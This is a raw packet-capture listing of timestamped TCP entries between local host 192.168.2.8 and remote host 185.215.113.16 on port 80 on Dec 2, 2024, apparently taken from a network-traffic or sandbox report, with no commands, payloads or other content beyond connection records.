                                                                                                                                                                                                        Dec 2, 2024 07:37:58.410789013 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.410878897 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.411533117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.411658049 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.411690950 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.412499905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.412561893 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.412583113 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.413383961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.413515091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.413629055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.414359093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.414431095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.414484978 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.415215969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.415348053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.415401936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.416165113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.416280031 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.416330099 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.417057037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.417160034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.417217016 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.417999029 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.418107033 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.418165922 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.418895960 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.419007063 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.419064045 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.419816971 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.419892073 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.419930935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.420758963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.420815945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.420844078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.421664000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.421788931 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.421844006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.422586918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.422756910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.422916889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.423573971 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.423641920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.423651934 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.424432039 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.424499035 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.424531937 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.425472021 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.425484896 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.425529957 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.426249027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.426364899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.426460981 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.427150011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.427192926 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.427213907 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.428112030 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.428170919 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.428195953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.428987980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.429092884 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.429147959 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.429898024 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.430000067 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.430073023 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.430802107 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.430860043 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.430932999 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.431761026 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.431827068 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.431852102 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.432670116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.432770967 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.432843924 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.433608055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.433651924 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.433778048 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.434540987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.434631109 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.434633970 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.435453892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.435507059 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.435539961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.436386108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.436428070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.436444998 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.437232971 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.437326908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.437400103 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.438183069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.438525915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.438604116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.439115047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.439178944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.439302921 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.440015078 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.440089941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.440094948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.440895081 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.441015959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.441076994 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.441890001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.441963911 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.442044020 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.442749023 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.442842007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.442908049 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.443743944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.443758011 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.443799973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.444562912 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.444694996 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.444763899 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.445483923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.445549011 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.445638895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.446271896 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.446414948 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.446481943 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.446496010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.447323084 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.447334051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.447396040 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.448271990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.448333979 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.448415995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.448833942 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.449163914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.449222088 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.449260950 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.450119019 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.450179100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.450272083 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.451042891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.451117992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.451219082 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.451936007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.451948881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.452007055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.452817917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.452950001 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.453007936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.453748941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.453862906 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.453915119 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.454615116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.454713106 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.455442905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596411943 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596460104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596524954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596529007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596618891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.596714973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.597450972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.597595930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.597640991 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.598361969 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.598448038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.598501921 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.610836029 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.610980988 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.611049891 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.611304045 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.611449957 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.611505032 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.612268925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.612409115 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.612467051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.613193989 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.613272905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.613354921 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.614048958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.614290953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.614361048 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.614976883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.615073919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.615197897 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.615909100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.616003990 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.616053104 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.616808891 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.616924047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.617166996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.617744923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.617885113 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.617955923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.618685007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.618813992 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.618921995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.619553089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.619648933 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.619699955 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.620501995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.620568037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.620667934 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.621424913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.621575117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.621620893 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.622390985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.622451067 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.622534037 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.623243093 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.623303890 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.623361111 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.624192953 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.624248981 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.624488115 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.625046968 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.625154972 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.625217915 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.626008987 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.626071930 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.626287937 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.626912117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.626954079 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.627058983 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.627800941 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.627943039 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.628042936 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.628763914 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.628938913 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.629033089 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.629671097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.629836082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.629883051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.630613089 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.630696058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.630768061 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.631496906 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.631539106 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.631598949 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.632445097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.632538080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.632627010 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.633325100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.633436918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.633567095 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.634232998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.634361982 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.634428978 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.635143995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.635271072 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.635329962 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.636079073 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.636189938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.636466980 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.637006044 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.637059927 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.637171030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.637921095 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.638045073 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.638142109 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.638854027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.639055014 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.639101028 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.639758110 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.639841080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.639895916 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.640657902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.640746117 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.640826941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.641608000 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.641624928 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.641721964 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.642467022 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.642554998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.642623901 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.643429041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.643527031 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.643702030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.644375086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.644443989 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.644577026 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.645241022 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.645366907 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.645499945 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.646152973 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.646200895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.646289110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.647066116 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.647200108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:58.647284985 CET4971980192.168.2.8185.215.113.16
